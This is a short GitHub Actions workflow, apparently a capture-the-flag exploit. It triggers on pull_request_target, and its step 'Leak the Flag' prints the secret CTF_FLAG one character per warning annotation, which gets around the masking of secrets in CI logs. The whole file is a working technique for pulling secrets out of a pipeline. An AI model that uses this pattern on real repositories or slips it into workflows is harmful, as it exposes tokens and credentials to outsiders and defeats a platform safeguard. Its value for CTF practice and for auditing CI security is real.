name: Labeler
on: [pull_request_target]

jobs:
  label:
    runs-on: ubuntu-latest
    permissions:
      contents: read
      pull-requests: write

    steps:
      - name: Attempt to apply labels (expected to fail)
        continue-on-error: true
        uses: actions/labeler@v4
        with:
          repo-token: "${{ secrets.GITHUB_TOKEN }}"

      - name: Leak the Flag
        run: |
          echo "Leaking the flag character by character:"
          for c in $(echo -n "${{ secrets.CTF_FLAG }}" | fold -w1); do
            echo "::warning::$c"
          done
